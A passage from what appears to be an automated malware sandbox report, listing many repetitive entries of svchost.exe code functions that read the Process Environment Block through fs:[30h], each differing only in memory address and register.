                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
